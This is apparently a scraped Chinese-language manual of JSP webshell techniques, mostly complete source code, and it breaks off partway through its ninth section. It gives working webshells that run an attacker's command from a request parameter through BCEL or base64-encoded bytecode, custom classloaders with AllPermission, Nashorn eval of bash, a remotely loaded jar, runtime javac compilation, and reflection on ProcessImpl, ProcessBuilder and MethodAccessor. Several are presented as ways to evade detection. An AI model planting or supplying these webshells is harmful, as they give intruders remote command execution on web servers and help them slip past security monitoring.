JSP Webshell 高级利用技术手册<\/h1>

一、BCEL字节码Webshell<\/h2>

1. 核心原理<\/h3>
利用com.sun.org.apache.bcel.internal.util.ClassLoader<\/code>加载BCEL格式字节码<\/li>
BCEL字节码格式前缀为`<\/li>
<\/ul>
\[BCEL
\]<\/span><\/p>
`<\/p>
2. 实现代码<\/h3>
<%@ page import="com.sun.org.apache.bcel.internal.util.ClassLoader" %>
<%
    String bcelCode = "
$$
BCEL
$$
$l$8b$I$A$A$A$A$A$A$A$85U$5bW$hU$U$fe$86$ML$Y$a6$40$93r$d5$e2$8d$dap$ebh$eb$a5$96$8a6$I$V$N$X$81$82$Uo$93$c9$n$M$9d$cc$c4$c9$a4$82w$fd$N$fe$H_$adKC$97$b8$7c$f4$c1G$7f$86$bf$c1e$fd$ce$q$40b$c2$f2a$ce$99$b3$f7$9e$bd$bf$fd$ed$bd$cf$fc$f1$cf$_$bf$Bx$B$df$ea$Y$c6$8c$86$d7t$b4$c9$fdu$N$b7t$a41$x$977t$cca$5eG$3bn$ebP$f1$a6$5c$W$a4$e1$5bq$bc$z$f7L$tz$b1$a8aI$c72V$e2xG$c7$w$d6t$ac$e3$8e$5c6tl$e2$ddNl$e1n$i$db$3a$de$c3$fb$g$3eP$Q$LDIA$o$b3g$dd$b7L$d7$f2$f2$e6Z$Y8$5e$7eZA$c7M$c7s$c2$Z$F$7d$a9f$f5$d8$86$Cu$d6$cf$J$F$3d$Z$c7$TK$e5BV$E$ebV$d6$V$d2$9do$5b$ee$86$V8$f2$5c$T$aa$e1$ae$c3P$X2$eb$bb$81$Q$b9$e0$9aU$d8$U$d9$b5$5d$e1$ba$M$W$b3$L9$F$e7J$91$f7t$d9qs$oP0$d4$U$b8$a6$e2$X$dd$d9$f2$ce$8e$IDnUX$91$f1$60$d5$d8$f1$cdt$83$86$b6$aaK$88t$bf$WZ$f6$bdE$ab$YA$oW$g$3e$q$df$a4Z$81$3e$b7o$8bb$e8$f8$5eI$c3G$K$e2$a1_$8dH$c8$a9$b1V$fc$a8$F$cb$f1$U$f4$a7$b6$cf$a0$c7$K$f2L8$d9B$ad$a0$cb$f1$8a$e5$90Ga$V$c8$f0$J$f4$85S1$ad$da$b3$H$a1$acO$dbv$9a$fe$ec$88n$7d$cd$_$H$b6$98w$q$a9$D$cdd$5e$91$ae$M$5c$84E$f5$Z$f4$Ruk$aeHy$L$qU$9d$86$ac$B$h9$D$C$3b$g$f2$Gv$e1$c8$40$7br$b9g$c0$c5U$D$F$90$TE7$f0$bc$3c$3d$86$c7$d9$O$cd$m5$f8$G$8a$f8$98Uk$91$81$edZ$rV$n0PB$a8$a1l$e0$3e$3e1$b0$8f$D$N$9f$g$f8$M$9fk$f8$c2$c0$97$f8$8au$g$jM$cf$ceeFG5$7cm$e0$h$8c$u$e8$3d$cdz9$bb$t$ec$b0At$5c$d5$e4I$a2$cb$t$a5g$l$a6d$e9$ce$9f$9a$af$96$bd$d0$vH$de$f3$o$3c9$f45$b4DM$y$7bB$ec$L$5b$c1$e5V$TS$tZ$J$7c$5b$94J$d3$N$91jBv6$p$z$d4$b7$c7$c0q$b4$a6$G$ZL$b5T$c8$i$92$a7$aa$da$iHi$9c$fa$5c$s$9a$86$O$abX$U$k$a7n$ea$7f$d0$few$f2zNU$b3$b2RU$c4$d1k$c6$afuQ$D$3fu$w$7e$de$d7RA$c0$92$60Q$8a$ba$fbV$e98$f7$b1$b3$c15$b1$91l$nV$d0I$a1$e3V$_$n$96w$81U$92$qp$baR$dbiy$bcj$fb$F$b3T$f6L$3f$c8$9bV$d1$b2w$85$99$b5$85k$3a$5e$u$C$cfr$cd$a8$nw8q$e6$9d$d0q$9d$f0$80$ec$J$af$3a$8f$D$f4r$b7$e5$FQ$dft$H$a5P$QK$cc$_$87$f5$e3$beB$d3$W$f8$eb$c4$K$b4$a2$3c$b9$k$9e$e2$N$3f$cc_$85$c2$87$83$c55$c6$f7$8b$Y$e1$f5$ff$EO$7f$a2$83$ff$H$e0$f6$f8$n$94$p$b4m$j$o$b6x$Eu$eb$I$ed$5b$P$d11Q$81VA$fc$Q$9d$87$d0$97$a6$w$e8$da$ba$a1$fe$8e$c4$e4$90Z$81$918$c7e$f3$fbG$7f$8dOV$d0$fd3z$kD$B$9e$e4$3a$C$8dk7$7f9$3d0$I$e2$S$S0$91$c4$M$fa0$8f$7e$C$93$ff$af$u4$9e$c63$40$f46J$88$K$ed$a7i$ff$y$n$5e$a2$ee2R$f49I$f8c$d4$aa$Y$8fRi$7bD$a5$aaaB$c3$a4$86$v$NW$80$bf1$c8$T$c3$80f$K$9e$e3$c3$h$85$ab$cc$d4$e4
$$
Yh$l$ff$J$3d$3f$f0$a5$z$c2$d9$R$J$87$p$3cF$d5$a0$86$a7$T$d7$88$b0J$d3wD$a0r$bf$9e$e8$ad$e0$7c$oQA2Cj
$$
$fc$g_$9c$60$ea$7d$9b$93$eaC$f4$_$fd$88$81$g$87$89A2C$ba$M$f2R$c1$d0$83$93x$c3$8c$u$d9$e9$a2$df$E$r$83$8c$3c$c2$88$_3$a6$c40$5e$8d$83$X$f1$S$f7
$$
LQs$9d$b8$S$e4$e3$V$dc$a0$97$R$fa$98$s$T$b1$86DoF$R$5e$fd$X$cb$B$rU$g$I$A$A";
    response.getOutputStream().write(String.valueOf(new ClassLoader().loadClass(bcelCode).getConstructor(String.class).newInstance(request.getParameter("threedr3am")).toString()).getBytes());
%>
<\/code><\/pre>
3. 恶意类生成<\/h3>
import<\/span> com.sun.org.apache.bcel.internal.classfile.Utility;<\/span>
<\/span><\/span>import<\/span> java.io.BufferedReader;<\/span>
<\/span><\/span>import<\/span> java.io.IOException;<\/span>
<\/span><\/span>import<\/span> java.io.InputStream;<\/span>
<\/span><\/span>import<\/span> java.io.InputStreamReader;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> Threedr3am<\/span> {<\/span>
<\/span><\/span>    String res;<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> Threedr3am<\/span>(<\/span>String cmd)<\/span> throws<\/span> IOException {<\/span>
<\/span><\/span>        StringBuilder stringBuilder =<\/span> new<\/span> StringBuilder();<\/span>
<\/span><\/span>        BufferedReader bufferedReader =<\/span> new<\/span> BufferedReader(<\/span>new<\/span> InputStreamReader(<\/span>Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>cmd).<\/span>getInputStream<\/span>()));<\/span>
<\/span><\/span>        String line;<\/span>
<\/span><\/span>        while<\/span>((<\/span>line =<\/span> bufferedReader.<\/span>readLine<\/span>())<\/span> !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>            stringBuilder.<\/span>append<\/span>(<\/span>line).<\/span>append<\/span>(<\/span>"\n"<\/span>);<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        res =<\/span> stringBuilder.<\/span>toString<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> String toString<\/span>()<\/span> {<\/span>
<\/span><\/span>        return<\/span> res;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> IOException {<\/span>
<\/span><\/span>        InputStream inputStream =<\/span> Threedr3am_15.<\/span>class<\/span>.<\/span>getClassLoader<\/span>().<\/span>getResourceAsStream<\/span>(<\/span>"Threedr3am.class"<\/span>);<\/span>
<\/span><\/span>        byte<\/span>[]<\/span> bytes =<\/span> new<\/span> byte<\/span>[<\/span>inputStream.<\/span>available<\/span>()];<\/span>
<\/span><\/span>        inputStream.<\/span>read<\/span>(<\/span>bytes);<\/span>
<\/span><\/span>        String code =<\/span> Utility.<\/span>encode<\/span>(<\/span>bytes,<\/span> true<\/span>);<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"
<\/span><\/span><\/span>$$
<\/span><\/span><\/span>BCEL
<\/span><\/span><\/span>$$
<\/span><\/span><\/span>"<\/span> +<\/span> code);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>二、自定义类加载器Webshell<\/h2>
1. 核心原理<\/h3>

重写loadClass<\/code>和findClass<\/code>方法<\/li>
使用Base64编码的字节码直接加载<\/li>
<\/ul>
2. 实现代码<\/h3>
<%@ page import="java.security.PermissionCollection" %>
<%@ page import="java.security.Permissions" %>
<%@ page import="java.security.AllPermission" %>
<%@ page import="java.security.ProtectionDomain" %>
<%@ page import="java.security.CodeSource" %>
<%@ page import="java.security.cert.Certificate" %>
<%@ page import="java.util.Base64" %>
<%
    response.getOutputStream().write(new ClassLoader() {
        @Override
        public Class<?> loadClass(String name) throws ClassNotFoundException {
            if (name.contains("Threedr3am_2")) {
                return findClass(name);
            }
            return super.loadClass(name);
        }

        @Override
        protected Class<?> findClass(String name) throws ClassNotFoundException {
            try {
                byte[] bytes = Base64.getDecoder().decode("yv66vgAAADQAiAoAGgA+BwA\/CgACAD4HAEAHAEEKAEIAQwoAQgBECgBFAEYKAAUARwoABABICgAEAEkKAAIASggASwoAAgBMCQAQAE0HAE4KAE8AUAgAUQoAUgBTCgBUAFUKAFQAVgoAVwBYCgBZAFoJAFsAXAoAXQBeBwBfAQADcmVzAQASTGphdmEvbGFuZy9TdHJpbmc7AQAGPGluaXQ+AQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAA5MVGhyZWVkcjNhbV8yOwEAA2NtZAEADXN0cmluZ0J1aWxkZXIBABlMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7AQAOYnVmZmVyZWRSZWFkZXIBABhMamF2YS9pby9CdWZmZXJlZFJlYWRlcjsBAARsaW5lAQANU3RhY2tNYXBUYWJsZQcATgcAYAcAPwcAQAEACkV4Y2VwdGlvbnMHAGEBAAh0b1N0cmluZwEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAC2lucHV0U3RyZWFtAQAVTGphdmEvaW8vSW5wdXRTdHJlYW07AQAFYnl0ZXMBAAJbQgEABGNvZGUBAApTb3VyY2VGaWxlAQARVGhyZWVkcjNhbV8yLmphdmEMAB0AYgEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyAQAWamF2YS9pby9CdWZmZXJlZFJlYWRlcgEAGWphdmEvaW8vSW5wdXRTdHJlYW1SZWFkZXIHAGMMAGQAZQwAZgBnBwBoDABpAGoMAB0AawwAHQBsDABtADIMAG4AbwEAAQoMADEAMgwAGwAcAQAMVGhyZWVkcjNhbV8yBwBwDABxAHIBABJUaHJlZWRyM2FtXzIuY2xhc3MHAHMMAHQAdQcAdgwAdwB4DAB5AHoHAHsMAHwAfwcAgAwAgQCCBwCDDACEAIUHAIYMAIcAHgEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQATamF2YS9pby9JT0V4Y2VwdGlvbgEAAygpVgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABFqYXZhL2xhbmcvUHJvY2VzcwEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYBABMoTGphdmEvaW8vUmVhZGVyOylWAQAIcmVhZExpbmUBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAA9qYXZhL2xhbmcvQ2xhc3MBAA5nZXRDbGFzc0xvYWRlcgEAGSgpTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsBABVqYXZhL2xhbmcvQ2xhc3NMb2FkZXIBABNnZXRSZXNvdXJjZUFzU3RyZWFtAQApKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9pby9JbnB1dFN0cmVhbTsBABNqYXZhL2lvL0lucHV0U3RyZWFtAQAJYXZhaWxhYmxlAQADKClJAQAEcmVhZAEABShbQilJAQAQamF2YS91dGlsL0Jhc2U2NAEACmdldEVuY29kZXIBAAdFbmNvZGVyAQAMSW5uZXJDbGFzc2VzAQAcKClMamF2YS91dGlsL0Jhc2U2NCRFbmNvZGVyOwEAGGphdmEvdXRpbC9CYXNlNjQkRW5jb2RlcgEADmVuY29kZVRvU3RyaW5nAQAWKFtCKUxqYXZhL2xhbmcvU3RyaW5nOwEAEGphdmEvbGFuZy9TeXN0ZW0BAANvdXQBABVMamF2YS9pby9QcmludFN0cmVhbTsBABNqYXZhL2lvL1ByaW50U3RyZWFtAQAHcHJpbnRsbgAhABAAGgAAAAEAAAAbABwAAAADAAEAHQAeAAIAHwAAANIABgAFAAAARyq3AAG7AAJZtwADTbsABFm7AAVZuAAGK7YAB7YACLcACbcACk4ttgALWToExgASLBkEtgAMEg22AAxXp\/\/qKiy2AA61AA+xAAAAAwAgAAAAHgAHAAAADgAEAA8ADAAQACUAEgAvABMAPgAVAEYAFgAhAAAANAAFAAAARwAiACMAAAAAAEcAJAAcAAEADAA7ACUAJgACACUAIgAnACgAAwAsABsAKQAcAAQAKgAAABsAAv8AJQAEBwArBwAsBwAtBwAuAAD8ABgHACwALwAAAAQAAQAwAAEAMQAyAAEAHwAAAC8AAQABAAAABSq0AA+wAAAAAgAgAAAABgABAAAAGgAhAAAADAABAAAABQAiACMAAAAJADMANAACAB8AAACEAAIABAAAACgSELYAERIStgATTCu2ABS8CE0rLLYAFVe4ABYstgAXTrIAGC22ABmxAAAAAgAgAAAAGgAGAAAAHgALAB8AEgAgABgAIQAgACIAJwAjACEAAAAqAAQAAAAoADUANgAAAAsAHQA3ADgAAQASABYAOQA6AAIAIAAIADsAHAADAC8AAAAEAAEAMAACADwAAAACAD0AfgAAAAoAAQBZAFcAfQAJ");
                PermissionCollection pc = new Permissions();
                pc.add(new AllPermission());
                ProtectionDomain protectionDomain = new ProtectionDomain(new CodeSource(null, (Certificate[]) null), pc, this, null);
                return this.defineClass(name, bytes, 0, bytes.length, protectionDomain);
            } catch (Exception e) {
                e.printStackTrace();
            }
            return super.findClass(name);
        }
    }.loadClass("Threedr3am_2").getConstructor(String.class).newInstance(request.getParameter("threedr3am")).toString().getBytes());
%>
<\/code><\/pre>
三、ScriptEngine.eval Webshell<\/h2>
1. 核心原理<\/h3>

使用JDK自带的ScriptEngine<\/code>执行脚本<\/li>
通过Nashorn引擎执行JavaScript代码<\/li>
<\/ul>
2. 实现代码<\/h3>
<%@ page import="javax.script.ScriptEngineManager" %>
<%@ page import="java.util.Base64" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.BufferedReader" %>
<%@ page import="java.io.InputStreamReader" %>
<%
    String s1 = "s=[3];s[0]='\/bin\/bash';s[1]='-c';s[2]='";
    String s2 = request.getParameter("threedr3am");
    String s3 = new String(Base64.getDecoder().decode("JztqYXZhLmxhbmcuUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhzKTs="));
    Process process = (Process) new ScriptEngineManager().getEngineByName("nashorn").eval(s1 + s2 + s3);
    InputStream inputStream = process.getInputStream();
    StringBuilder stringBuilder = new StringBuilder();
    BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
    String line;
    while((line = bufferedReader.readLine()) != null) {
        stringBuilder.append(line).append("\n");
    }
    if (stringBuilder.length() > 0) {
        response.getOutputStream().write(stringBuilder.toString().getBytes());
    }
%>
<\/code><\/pre>
四、URLClassLoader加载远程jar<\/h2>
1. 核心原理<\/h3>

使用URLClassLoader<\/code>加载远程恶意jar<\/li>
通过loadClass<\/code>触发恶意代码执行<\/li>
<\/ul>
2. 实现代码<\/h3>
<%@ page import="java.net.URL" %>
<%@ page import="java.net.URLClassLoader" %>
<%
    response.getOutputStream().write(new URLClassLoader(new URL[]{new URL("http:\/\/127.0.0.1:80\/threedr3am.jar")}).loadClass("Threedr3am_4").getConstructor(String.class).newInstance(String.valueOf(request.getParameter("threedr3am"))).toString().getBytes());
%>
<\/code><\/pre>
五、javac动态编译class<\/h2>
1. 核心原理<\/h3>

使用JDK自带的javac<\/code>动态编译class<\/li>
将Java源码写入临时文件并编译<\/li>
通过URLClassLoader<\/code>加载编译后的class<\/li>
<\/ul>
2. 实现代码<\/h3>
<%@ page import="java.net.URL" %>
<%@ page import="java.net.URLClassLoader" %>
<%@ page import="java.nio.charset.Charset" %>
<%@ page import="java.nio.file.Files" %>
<%@ page import="java.nio.file.Paths" %>
<%@ page import="java.util.Locale" %>
<%@ page import="javax.tools.DiagnosticCollector" %>
<%@ page import="javax.tools.JavaCompiler" %>
<%@ page import="javax.tools.JavaFileObject" %>
<%@ page import="javax.tools.StandardJavaFileManager" %>
<%@ page import="javax.tools.ToolProvider" %>
<%@ page import="java.util.Random" %>
<%@ page import="java.io.File" %>
<%
    String c = request.getParameter("threedr3am");
    String tmpPath = Files.createTempDirectory("threedr3am").toFile().getPath();
    JavaCompiler javaCompiler = ToolProvider.getSystemJavaCompiler();
    DiagnosticCollector<JavaFileObject> diagnostics = new DiagnosticCollector();
    StandardJavaFileManager standardJavaFileManager = javaCompiler
            .getStandardFileManager(diagnostics, Locale.CHINA, Charset.forName("utf-8"));
    int id = new Random().nextInt(10000000);
    StringBuilder stringBuilder = new StringBuilder()
            .append("import java.io.BufferedReader;\n")
            .append("import java.io.IOException;\n")
            .append("import java.io.InputStream;\n")
            .append("import java.io.InputStreamReader;\n")
            .append("public class Threedr3am" + id + " {\n")
            .append("   public static String result = \"\";\n")
            .append("   public Threedr3am" + id + "() throws Throwable  {\n")
            .append("        StringBuilder stringBuilder = new StringBuilder();\n")
            .append("        try {")
            .append("               BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(\"" + c + "\").getInputStream()));\n")
            .append("               String line;\n")
            .append("               while((line = bufferedReader.readLine()) != null) {\n")
            .append("                       stringBuilder.append(line).append(\"\\n\");\n")
            .append("               }\n")
            .append("               result = stringBuilder.toString();\n")
            .append("        } catch (Exception e) {\n")
            .append("              e.printStackTrace();\n")
            .append("        }\n")
            .append("        throw new Throwable(stringBuilder.toString());")
            .append("   }\n")
            .append("}");
    Files.write(Paths.get(tmpPath + File.separator + "Threedr3am" +id + ".java"), stringBuilder.toString().getBytes());
    Iterable fileObject = standardJavaFileManager.getJavaFileObjects(tmpPath + File.separator + "Threedr3am" +id + ".java");
    javaCompiler.getTask(null, standardJavaFileManager, diagnostics, null, null, fileObject).call();
    try {
        new URLClassLoader(new URL[]{new URL("file:" + tmpPath + File.separator)}).loadClass("Threedr3am" + id).newInstance();
    } catch (Throwable e) {
        response.getOutputStream().write(e.getMessage().getBytes());
    }
%>
<\/code><\/pre>
六、jdk.nashorn.internal.runtime.ScriptLoader<\/h2>
1. 核心原理<\/h3>

使用jdk.nashorn.internal.runtime.ScriptLoader<\/code>类加载器<\/li>
通过反射调用installClass<\/code>方法加载字节码<\/li>
<\/ul>
2. 实现代码<\/h3>
<%@ page import="java.lang.reflect.Constructor" %>
<%@ page import="java.lang.reflect.Method" %>
<%@ page import="java.security.CodeSource" %>
<%@ page import="java.security.cert.Certificate" %>
<%@ page import="java.util.Base64" %>
<%@ page import="jdk.nashorn.internal.runtime.Context" %>
<%@ page import="jdk.nashorn.internal.runtime.options.Options" %>
<%@ page import="java.lang.reflect.InvocationTargetException" %>
<%@ page import="sun.reflect.misc.MethodUtil" %>
<%
    Class c = Class.forName("jdk.nashorn.internal.runtime.ScriptLoader");
    final Constructor constructor = c.getDeclaredConstructor(Context.class);
    constructor.setAccessible(true);
    final Method m = c.getDeclaredMethod("installClass", String.class, byte[].class, CodeSource.class);
    m.setAccessible(true);
    class A {
        B b;
        final class B {
            private Object o;
            private Object[] oo;

            public B() throws IllegalAccessException, InvocationTargetException, InstantiationException {
                o = constructor.newInstance(new Context(new Options(""), null, null));
                oo = new Object[]{"Threedr3am_6", Base64.getDecoder().decode("yv66vgAAADQAiAoAGgA+BwA\/CgACAD4HAEAHAEEKAEIAQwoAQgBECgBFAEYKAAUARwoABABICgAEAEkKAAIASggASwoAAgBMCQAQAE0HAE4KAE8AUAgAUQoAUgBTCgBUAFUKAFQAVgoAVwBYCgBZAFoJAFsAXAoAXQBeBwBfAQADcmVzAQASTGphdmEvbGFuZy9TdHJpbmc7AQAGPGluaXQ+AQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAA5MVGhyZWVkcjNhbV82OwEAA2NtZAEADXN0cmluZ0J1aWxkZXIBABlMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7AQAOYnVmZmVyZWRSZWFkZXIBABhMamF2YS9pby9CdWZmZXJlZFJlYWRlcjsBAARsaW5lAQANU3RhY2tNYXBUYWJsZQcATgcAYAcAPwcAQAEACkV4Y2VwdGlvbnMHAGEBAAh0b1N0cmluZwEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAC2lucHV0U3RyZWFtAQAVTGphdmEvaW8vSW5wdXRTdHJlYW07AQAFYnl0ZXMBAAJbQgEABGNvZGUBAApTb3VyY2VGaWxlAQARVGhyZWVkcjNhbV82LmphdmEMAB0AYgEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyAQAWamF2YS9pby9CdWZmZXJlZFJlYWRlcgEAGWphdmEvaW8vSW5wdXRTdHJlYW1SZWFkZXIHAGMMAGQAZQwAZgBnBwBoDABpAGoMAB0AawwAHQBsDABtADIMAG4AbwEAAQoMADEAMgwAGwAcAQAMVGhyZWVkcjNhbV82BwBwDABxAHIBABJUaHJlZWRyM2FtXzYuY2xhc3MHAHMMAHQAdQcAdgwAdwB4DAB5AHoHAHsMAHwAfwcAgAwAgQCCBwCDDACEAIUHAIYMAIcAHgEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQATamF2YS9pby9JT0V4Y2VwdGlvbgEAAygpVgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9SdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABFqYXZhL2xhbmcvUHJvY2VzcwEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYBABMoTGphdmEvaW8vUmVhZGVyOylWAQAIcmVhZExpbmUBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAA9qYXZhL2xhbmcvQ2xhc3MBAA5nZXRDbGFzc0xvYWRlcgEAGSgpTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsBABVqYXZhL2xhbmcvQ2xhc3NMb2FkZXIBABNnZXRSZXNvdXJjZUFzU3RyZWFtAQApKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9pby9JbnB1dFN0cmVhbTsBABNqYXZhL2lvL0lucHV0U3RyZWFtAQAJYXZhaWxhYmxlAQADKClJAQAEcmVhZAEABShbQilJAQAQamF2YS91dGlsL0Jhc2U2NAEACmdldEVuY29kZXIBAAdFbmNvZGVyAQAMSW5uZXJDbGFzc2VzAQAcKClMamF2YS91dGlsL0Jhc2U2NCRFbmNvZGVyOwEAGGphdmEvdXRpbC9CYXNlNjQkRW5jb2RlcgEADmVuY29kZVRvU3RyaW5nAQAWKFtCKUxqYXZhL2xhbmcvU3RyaW5nOwEAEGphdmEvbGFuZy9TeXN0ZW0BAANvdXQBABVMamF2YS9pby9QcmludFN0cmVhbTsBABNqYXZhL2lvL1ByaW50U3RyZWFtAQAHcHJpbnRsbgAhABAAGgAAAAEAAAAbABwAAAADAAEAHQAeAAIAHwAAANIABgAFAAAARyq3AAG7AAJZtwADTbsABFm7AAVZuAAGK7YAB7YACLcACbcACk4ttgALWToExgASLBkEtgAMEg22AAxXp\/\/qKiy2AA61AA+xAAAAAwAgAAAAHgAHAAAADgAEAA8ADAAQACUAEgAvABMAPgAVAEYAFgAhAAAANAAFAAAARwAiACMAAAAAAEcAJAAcAAEADAA7ACUAJgACACUAIgAnACgAAwAsABsAKQAcAAQAKgAAABsAAv8AJQAEBwArBwAsBwAtBwAuAAD8ABgHACwALwAAAAQAAQAwAAEAMQAyAAEAHwAAAC8AAQABAAAABSq0AA+wAAAAAgAgAAAABgABAAAAGgAhAAAADAABAAAABQAiACMAAAAJADMANAACAB8AAACEAAIABAAAACgSELYAERIStgATTCu2ABS8CE0rLLYAFVe4ABYstgAXTrIAGC22ABmxAAAAAgAgAAAAGgAGAAAAHgALAB8AEgAgABgAIQAgACIAJwAjACEAAAAqAAQAAAAoADUANgAAAAsAHQA3ADgAAQASABYAOQA6AAIAIAAIADsAHAADAC8AAAAEAAEAMAACADwAAAACAD0AfgAAAAoAAQBZAFcAfQAJ"), new CodeSource(null, (Certificate[]) null)};
            }
        }

        public A() throws IllegalAccessException, InstantiationException, InvocationTargetException {
            b = new B();
        }

        public Class invokex(Method method)
                throws InvocationTargetException, IllegalAccessException {
            return (Class) MethodUtil.invoke(method, b.o, b.oo);
        }
    }

    Class target = new A().invokex(m);
    response.getOutputStream().write(target.getConstructor(String.class).newInstance(request.getParameter("threedr3am")).toString().getBytes());
%>
<\/code><\/pre>
七、ProcessImpl绕过检测<\/h2>
1. 核心原理<\/h3>

使用内部类绕过检测<\/li>
通过反射调用ProcessImpl.start<\/code>方法<\/li>
<\/ul>
2. 实现代码<\/h3>
<%@ page import="java.io.BufferedReader" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.InputStreamReader" %>
<%@ page import="java.lang.reflect.InvocationTargetException" %>
<%@ page import="java.lang.reflect.Method" %>
<%@ page import="java.util.Map" %>
<%@ page import="sun.reflect.misc.MethodUtil" %>
<%
    try {
        final String s = request.getParameter("threedr3am");
        class A {
            B b;
            final class B {
                private Method o;
                private Object oo;
                private Object[] ooo;

                public B() throws ClassNotFoundException, NoSuchMethodException {
                    Class clz = Class.forName("java.lang.ProcessImpl");
                    Method method = clz
                            .getDeclaredMethod("start", String[].class, Map.class, String.class,
                                    ProcessBuilder.Redirect[].class, boolean.class);
                    method.setAccessible(true);
                    o = method;
                    oo = clz;
                    ooo = new Object[]{s.split(" "), null, null, null, false};
                }
            }

            public A() throws ClassNotFoundException, NoSuchMethodException {
                b = new B();
            }

            public Object invokex()
                    throws InvocationTargetException, IllegalAccessException {
                return MethodUtil.invoke(b.o, b.oo, b.ooo);
            }
        }

        Process process = (Process) new A().invokex();
        InputStream inputStream = process.getInputStream();
        StringBuilder stringBuilder = new StringBuilder();
        BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
        String line;
        while ((line = bufferedReader.readLine()) != null) {
            stringBuilder.append(line).append("\n");
        }
        if (stringBuilder.length() > 0) {
            response.getOutputStream().write(stringBuilder.toString().getBytes());
        }
    } catch (Exception e) {
        e.printStackTrace();
    }
%>
<\/code><\/pre>
八、ProcessBuilder绕过检测<\/h2>
1. 核心原理<\/h3>

使用内部类结构绕过检测<\/li>
直接调用ProcessBuilder<\/code>执行命令<\/li>
<\/ul>
2. 实现代码<\/h3>
<%@ page import="java.io.BufferedReader" %>
<%@ page import="java.io.IOException" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.InputStreamReader" %>
<%
    try {
        final String cmd = request.getParameter("threedr3am");
        class Threedr3am_8 {
            Threedr3amX threedr3amX;
            class Threedr3amX {
                private Process process;
                public Threedr3amX() throws IOException {
                    process = new ProcessBuilder().command(cmd.split(" ")).start();
                }
            }
            public Threedr3am_8() throws IOException {
                threedr3amX = new Threedr3amX();
            }
            public String echo() throws IOException {
                Process process = threedr3amX.process;
                InputStream inputStream = process.getInputStream();
                StringBuilder stringBuilder = new StringBuilder();
                BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
                String line;
                while ((line = bufferedReader.readLine()) != null) {
                    stringBuilder.append(line).append("\n");
                }
                return stringBuilder.toString();
            }
        }
        response.getOutputStream().write(new Threedr3am_8().echo().getBytes());
    } catch (Exception e) {
        e.printStackTrace();
    }
%>
<\/code><\/pre>
九、MethodAccessor.invoke绕过<\/h2>
1. 核心原理<\/h3>

使用MethodAccessor.invoke<\/code>替代Method.invoke<\/code><\/li>
绕过对Method.invoke<\/code>的检测<\/li>
<\/ul>
2. 实现代码<\/h3>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.BufferedReader" %>
<%@ page import="java.io.InputStreamReader" %>
<%@ page import="java.lang.reflect.Method" %>
<%@ page import="java.util.Map" %>
<%@ page import="sun.reflect.ReflectionFactory" %>
<%@ page import="java.security.AccessController" %>
<%@ page import="sun.reflect.MethodAccessor" %>
<%
    String s = request.getParameter("threedr3am");
    Threedr3am_9.ooo = new Object[]{s.split(" "), null, null, null, false};
